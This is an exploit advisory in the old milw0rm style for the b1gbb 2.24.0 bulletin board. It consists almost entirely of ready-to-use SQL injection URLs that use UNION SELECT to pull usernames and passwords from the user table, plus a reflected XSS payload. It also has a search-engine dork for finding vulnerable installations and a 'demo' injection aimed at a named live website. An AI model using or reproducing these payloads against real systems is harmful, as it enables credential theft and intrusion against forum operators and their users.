# b1gbb 2.24.0 (SQL/XSS) Remote Vulnerabilities
# D.Script :
     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip
# Exploits SQL :
//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
     OR
/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
     Demo
http://www.gkovacs.de/forum/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
# Exploit XSS :
     /visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
# Dork:
       "powered by b1gBB (b1g Bulletion Board)"
# Discovered by:
       GoLd_M = [Mahmood_ali] & t0pP8uZz
# Homepage:
     http://www.Tryag.Com/cc
# Sp.Thanx To :
       Tryag-Team & G0t-Root.Net
# milw0rm.com [2007-06-28]